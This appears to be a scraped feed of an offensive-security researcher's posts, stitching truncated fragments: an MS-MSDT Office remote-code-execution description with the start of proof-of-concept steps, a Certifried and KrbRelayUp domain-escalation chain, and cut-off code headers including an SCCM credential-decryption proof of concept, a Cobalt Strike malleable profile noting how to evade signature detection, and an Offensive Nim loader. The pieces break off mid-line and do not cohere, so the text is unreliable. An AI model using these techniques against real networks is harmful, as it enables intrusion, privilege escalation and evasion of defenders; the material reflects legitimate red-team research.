Xenov Xenov-X

LSA Whisperer

Thank you to SpecterOps for supporting this research, to Elad for helping draft this blog, and to Sarah, Daniel, and Adam for proofreading and editing! Crossposted on the SpecterOps Blog.

What follows is the culmination of two years of research with funding by SpecterOps and contributions from many of my coworkers.

Special thanks are needed to Elad, Lee, Will, Daniel, and Kai. Elad, Lee, and Will have contributed several ideas to the project, which are documented here, and have each spent multiple days testing the tool. Daniel has answered all of my inevitable questions about AzureAD (whoops, now Ent

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.

Certifried combined with KrbRelayUp

Certifried (CVE-2022-26923) gives Domain Admin from non-privileged user with the requirement adding computer accounts or owning a computer account. Kerberos Relay targeting LDAP and Shadow Credentials gives a non-privileged domain user on a domain-joined machine local admin access on (aka owning) the machine. Combination of these two: non-privileged domain user escalating to Domain Admin without the requirement adding/owning computer accounts.

The attack below uses only Windows (no Linux tools interacting with the Domain), simulating a real-world attack scenario.

Prerequisites:

	using System;
	using System.Collections.Generic;
	using System.DirectoryServices.Protocols;
	using System.Globalization;
	using System.Linq;
	using System.Runtime.InteropServices;
	using System.Runtime.InteropServices.ComTypes;
	using System.Security.Policy;
	using System.Security.Principal;
	using System.Text;

	using NtApiDotNet;
	using NtApiDotNet.Ndr.Marshal;
	using NtApiDotNet.Win32;
	using NtApiDotNet.Win32.Rpc.Transport;
	using NtApiDotNet.Win32.Security.Authentication;
	using NtApiDotNet.Win32.Security.Authentication.Kerberos;
	using NtApiDotNet.Win32.Security.Authentication.Kerberos.Client;
	using NtApiDotNet.Win32.Security.Authentication.Kerberos.Server;
	using NtApiDotNet.Win32.Security.Authentication.Logon;
	using System;

	function Get-RdpLogonEvent
	{
	[CmdletBinding()]
	param(
	[Int32] $Last = 10
	)

	$RdpInteractiveLogons = Get-WinEvent -FilterHashtable @{
	LogName='Security'
	ProviderName='Microsoft-Windows-Security-Auditing'

	// Twitter thread: https://twitter.com/_xpn_/status/1543682652066258946 (was a bit bored ;)
	// Needs to be run on the SCCM server containing the "Microsoft Systems Management Server" CSP for it to work.

	using System;
	using System.Collections.Generic;
	using System.Runtime.InteropServices;

	namespace SCCMDecryptPOC
	{
	internal class Program

	# in addition to the profile, a stage0 loader is also required (default generated payloads are caught by signatures)
	# as stage0, remote injecting a thread into a suspended process works

	set host_stage "false";
	set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62";
	set sleeptime "10000";

	stage {
	set allocator "MapViewOfFile";
	set name "notevil.dll";


	# With special thanks to byt3bl33d3r for Offensive Nim!
	import winim/lean
	import osproc
	import base64
	import sequtils
	import strutils
	import strformat
	import httpclient

	#define _CRT_SECURE_NO_WARNINGS

	#include <iostream>
	#include <windows.h>
	#include <psapi.h>

	typedef struct _PS_ATTRIBUTE {
	ULONG Attribute;
	SIZE_T Size;
	union {